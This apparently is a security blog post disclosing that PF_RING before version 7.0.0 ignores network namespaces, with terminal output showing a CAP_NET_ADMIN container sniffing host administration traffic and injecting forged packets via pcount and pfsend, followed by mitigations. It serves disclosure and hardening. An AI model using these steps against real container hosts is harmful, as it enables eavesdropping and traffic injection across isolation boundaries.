Linux hardening and proper isolation using containerization can be tricky especially when performance is critical. We recently helped a client to design a secure network appliance that involve sniffing network traffic. This device has high security and performance constraints. This post is a feedback on the unlikely integration of fast sniffers with linux containers.

Context

Let's consider a network appliance running Linux that use PF_RING to lift packets from the NIC and feed those to sniffers isolated in containers.

PF_RING is a faster alternative to classic RAW socket sniffing. In a nutshell, packets coming from the NIC driver are put in a circular buffer without any processing. The sniffer then mmap() the buffer in userspace to access network packets.

Considering the security hardening requirements of the appliance, the sniffer should be as isolated as possible. Isolation should have as little of a performance impact as possible. Containers are a pretty good fit for this use case.

Before version 7.0.0 (the very last one as of this writing), PF_RING didn't support network namespaces. The only solution for the sniffers to access the circular packet buffer was to grant the CAP_NET_ADMIN capability. Granting that capability for a "normal" hardened container isn't great but with PF_RING it's worse...

Example architecture

Consider the following design for a dummy network sniffer:

Dummy IDS design

To quickly troubleshoot things, all containers are fully-fledge Ubuntu distributions. In a real-life scenario the ids-container would be super minimal and hardened. LxC v2 is used but the setup could be replicated with the container provider of your choice.

The host system has 2 network interfaces:

administration is performed on the secure LAN if-admin

sniffing is possible on the interface if-sniff

root@host:~# ip a 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host valid_lft forever preferred_lft forever 2: if-admin: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000 link/ether 52:54:00:4c:97:df brd ff:ff:ff:ff:ff:ff inet 192.168.122.221/24 brd 192.168.122.255 scope global if-admin valid_lft forever preferred_lft forever inet6 fe80::5054:ff:fe4c:97df/64 scope link valid_lft forever preferred_lft forever 3: if-sniff: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000 link/ether 22:22:22:22:22:22 brd ff:ff:ff:ff:ff:ff inet 192.168.110.2/24 brd 192.168.110.255 scope global if-sniff valid_lft forever preferred_lft forever inet6 fe80::2022:22ff:fe22:2222/64 scope link valid_lft forever preferred_lft forever 4: br0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default qlen 1000 link/ether fe:f8:d8:60:13:37 brd ff:ff:ff:ff:ff:ff inet 192.168.0.1/24 brd 192.168.0.255 scope global br0 valid_lft forever preferred_lft forever inet6 fe80::4030:e8ff:fe9a:c32b/64 scope link valid_lft forever preferred_lft forever 6: veth89U9YK@if5: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br0 state UP group default qlen 1000 link/ether fe:f8:d8:60:13:37 brd ff:ff:ff:ff:ff:ff link-netnsid 0 inet6 fe80::fcf8:d8ff:fe60:1337/64 scope link valid_lft forever preferred_lft forever root@host:~# ls -l /proc/self/ns/net lrwxrwxrwx 1 root root 0 May 4 14:40 /proc/self/ns/net -> net:[4026531957]

veth89U9YK@if5 is the virtual interface pair device of internet0 in app_container .

app-container only exposes sensitive services on the interface if-admin :

root@app-container:~# ip a 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host valid_lft forever preferred_lft forever 5: internet0@if6: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default qlen 1000 link/ether 00:16:01:54:9a:34 brd ff:ff:ff:ff:ff:ff inet 192.168.0.2/24 brd 192.168.0.255 scope global internet0 valid_lft forever preferred_lft forever inet6 fe80::216:1ff:fe54:9a34/64 scope link valid_lft forever preferred_lft forever root@app-container:~# ls -al /proc/self/ns/net lrwxrwxrwx 1 root root 0 May 4 12:48 /proc/self/ns/net -> net:[4026532250] root@app-container:~# ss -tan State Recv-Q Send-Q Local Address:Port Peer Address:Port LISTEN 0 5 192.168.0.2:8080 *:* # The exposed service is reachable by the administrator admin@it:~$ curl 192.168.122.221 Hello Admin

ids-container does not have any interface configured as it accesses if-sniff through PF_RING with CAP_NET_ADMIN :

root@ids-container:~# ip a 1: lo: <LOOPBACK> mtu 65536 qdisc noop state DOWN group default qlen 1 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 root@ids-container:~# ls /sys/class/net/ lo root@ids-container:~# grep ^Cap /proc/self/status CapInh: 0000000000000000 CapPrm: 0000000000001000 CapEff: 0000000000001000 CapBnd: 0000000000001000 CapAmb: 0000000000000000 root@ids-container:~# capsh --decode=0000000000001000 0x0000000000001000=cap_net_admin root@ids-container:~# ls -ls /proc/self/ns/net 0 lrwxrwxrwx 1 root root 0 May 4 12:52 /proc/self/ns/net -> net:[4026532310]

Communication between app-container and ids-container is not represented but let's say it's a channel not based on the networking stack.

On the host, the PF_RING kernel module is loaded with the default configuration and network interfaces are correctly detected:

root@host:~# insmod ./PF_RING-6.6.0/kernel/pf_ring.ko root@host:~# grep -r . /sys/module/pf_ring/parameters/* /sys/module/pf_ring/parameters/enable_debug:0 /sys/module/pf_ring/parameters/enable_frag_coherence:1 /sys/module/pf_ring/parameters/enable_ip_defrag:0 /sys/module/pf_ring/parameters/enable_tx_capture:1 /sys/module/pf_ring/parameters/force_ring_lock:0 /sys/module/pf_ring/parameters/min_num_slots:4096 /sys/module/pf_ring/parameters/perfect_rules_hash_size:4096 /sys/module/pf_ring/parameters/quick_mode:0 /sys/module/pf_ring/parameters/transparent_mode:0 root@host:~# cat /proc/net/pf_ring/info PF_RING Version : 6.6.0 (unknown) Total rings : 0 Standard (non ZC) Options Ring slots : 4096 Slot version : 16 Capture TX : Yes [RX+TX] IP Defragment : No Socket Mode : Standard Cluster Fragment Queue : 0 Cluster Fragment Discard : 0 root@host:~# ls -1 /proc/net/pf_ring/dev/ br0 if-admin if-sniff internet0 vethLXOGMB

Breaking namespace isolation

Everything looks good, we can sniff on the interface if-sniff inside the ids-container .

root@ids-container:./PF_RING-6.6.0/userland/examples# ./pcount -i if-sniff Capturing from if-sniff [...] ========================= Absolute Stats: [7 pkts rcvd][0 pkts dropped] Total Pkts=7/Dropped=0.0 % 7 pkts [0.7 pkt/sec] - 398 bytes [0.00 Mbit/sec] ========================= Actual Stats: 1 pkts [747.6 ms][1.34 pkt/sec] =========================

This looks good, until you try to sniff the interface any from within the ids-container ... and get the packets of if-admin .

root@ids-container:/# ./PF_RING-6.6.0/userland/examples/pcount -i any -v 2 -f 'tcp port 80' Capturing from any [...] 14:03:15.177815 [52:54:00:38:2D:01 -> 52:54:00:4C:97:DF] [TCP][192.168.122.1 -> 192.168.122.221] [caplen=133][len=133] 52 54 00 4C 97 DF 52 54 00 38 2D 01 08 00 45 00 00 77 D1 DE 40 00 40 06 F2 72 C0 A8 7A 01 C0 A8 7A DD D4 E0 00 50 9F 50 0F E1 22 04 08 77 50 18 00 E5 76 99 00 00 47 45 54 20 2F 20 48 54 54 50 2F 31 2E 31 0D 0A 48 6F 73 74 3A 20 31 39 32 2E 31 36 38 2E 31 32 32 2E 32 32 31 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 63 75 72 6C 2F 37 2E 35 38 2E 30 0D 0A 41 63 63 65 70 74 3A 20 2A 2F 2A 0D 0A 0D 0A # GET / HTTP/1.1\r

Host: 192.168.122.221\r

User-Agent: curl/7.58.0\r

Accept: */*\r

\r

[...] 14:03:15.178253 [52:54:00:4C:97:DF -> 52:54:00:38:2D:01] [TCP][192.168.122.221 -> 192.168.122.1] [caplen=172][len=172] 52 54 00 38 2D 01 52 54 00 4C 97 DF 08 00 45 00 00 9E A3 5E 40 00 3F 06 21 CC C0 A8 7A DD C0 A8 7A 01 00 50 D4 E0 22 04 08 88 9F 50 10 30 50 19 00 E5 76 C0 00 00 53 65 72 76 65 72 3A 20 42 61 73 65 48 54 54 50 2F 30 2E 33 20 50 79 74 68 6F 6E 2F 32 2E 37 2E 36 0D 0A 44 61 74 65 3A 20 46 72 69 2C 20 30 34 20 4D 61 79 20 32 30 31 38 20 31 34 3A 30 33 3A 31 35 20 47 4D 54 0D 0A 43 6F 6E 74 65 6E 74 2D 74 79 70 65 3A 20 61 70 70 6C 69 63 61 74 69 6F 6E 2F 74 65 78 74 0D 0A 0D 0A 48 65 6C 6C 6F 20 41 64 6D 69 6E 0A # Server: BaseHTTP/0.3 Python/2.7.6\r

Date: Fri, 04 May 2018 13:33:45 GMT\r

Content-type: application/text\r

\r

Hello Admin

' [...]

Indeed, any should correspond to all interfaces available in the network namespace. However this version of PF_RING doesn't support namespace isolation, so you get access to all of the host network interfaces. Effectively breaking the isolation.

Sniffing on one of the host network interface is also possible:

root@ids-container:/# ./PF_RING-6.6.0/userland/examples/pcount -i if-admin -v 2 -f 'tcp port 80' Capturing from if-admin 14:05:37.490554 [52:54:00:38:2D:01 -> 52:54:00:4C:97:DF] [TCP][192.168.122.1 -> 192.168.122.221] [caplen=74][len=74] 52 54 00 4C 97 DF 52 54 00 38 2D 01 08 00 45 00 00 3C 63 6B 40 00 40 06 61 21 C0 A8 7A 01 C0 A8 7A DD D4 EC 00 50 BC 71 0A 5C 00 00 00 00 A0 02 72 10 76 5E 00 00 02 04 05 B4 04 02 08 0A DC 3A BF 3F 00 00 00 00 01 03 03 07 [...]

Slight complication, accessing the host interfaces list from the container isn't possible. The pfring_findalldevs() function in the userland library ends up using the results from pfring_mod_findalldevs() which extracts the interfaces' names from /proc/net/pf_ring/dev/<iface>/info . Unless the LxC configuration explicitly mounts this path to the container, which should never happen, some interface name guessing is needed. A light bruteforce is required for systems with systemd udev version >= 197.

Loading the PF_RING module with default configuration also allows for writing packets to network interfaces.

root@host:~# grep TX /proc/net/pf_ring/info Capture TX : Yes [RX+TX]

To prove injecting an arbitrary packet from ids-container to app-container through PF_RING , a pcap of a simple UDP connection is captured and later injected:

# Captured packet to inject root@ids-container:~# tcpdump -XX -r UDP_test_packet.pcap reading from file UDP_test_packet.pcap, link-type EN10MB (Ethernet) 16:48:13.894163 IP 192.168.122.1.54219 > 192.168.122.221.1234: UDP, length 5 0x0000: 5254 004c 97df 5254 0038 2d01 0800 4500 RT.L..RT.8-...E. 0x0010: 0021 2982 4000 4011 9b1a c0a8 7a01 c0a8 .!).@.@.....z... 0x0020: 7add d3cb 04d2 000d 764e 4142 4344 0a z.......vNABCD. root@ids-container:./PF_RING-6.6.0/userland/examples# ./pfsend -f /UDP_test_packet.pcap -i internet0 -m 00:16:01:3b:aa:a7 -b 1 -v -S 192.168.0.3 -D 192.168.0.2 -z Sending packets on internet0 Using PF_RING v.6.6.0 Read 47 bytes packet from pcap file /UDP_test_packet.pcap [0.0 Secs = 0 ticks@0hz from beginning] Read 1 packets from pcap file /UDP_test_packet.pcap Dumping statistics on /proc/net/pf_ring/stats/2737-internet0.16 [0] pfring_send(47) returned 47 TX rate: [current 7'751.93 pps/0.00 Gbps][average 7'751.93 pps/0.00 Gbps][total 1.00 pkts] Sent 1 packets # In `app-container`, the forged packet is received root@app-container:/# tcpdump -vv -n -i internet0 -XX tcpdump: listening on internet0, link-type EN10MB (Ethernet), capture size 262144 bytes 15:50:40.297378 IP (tos 0x0, ttl 64, id 10626, offset 0, flags [DF], proto UDP (17), length 33) 192.168.0.3.54219 > 192.168.0.2.1234: [udp sum ok] UDP, length 5 0x0000: 0016 013b aaa7 5254 0038 2d01 0800 4500 ...;..RT.8-...E. 0x0010: 0021 2982 4000 4011 8ff4 c0a8 0003 c0a8 .!).@.@......... 0x0020: 0002 d3cb 04d2 000d 175a 4142 4344 0a .........ZABCD.

Mitigation

Make the change to version 7.0.0 of PF_RING , this last version patches the namespace isolation problem and introduce capture interface white-listing. Proper configuration of the kernel module and host+container hardening can be used to reduce the risk if upgrading is not a possibility.

Additionnally, "Capture TX" should be disabled if your sniffer don't use it.

root@host:~# insmod ./pf_ring.ko enable_tx_capture=0

Conclusion

We have seen that despite the use of containers, some external components don't support namespaces. In our setup, the isolated sniffer could in fact:

Monitor the administration network interface

Inject traffic to any network interface

Route packets between all network interfaces

Exfiltrate sniffed packets back to the attacker

The thing to remember here is that PF_RING is just one example. The same type of vulnerability might be found with netmap, DPDK, Snabbswitch, etc. "This is left as an exercise for the reader" ;)

Performance and security are not always such good friends.

Resources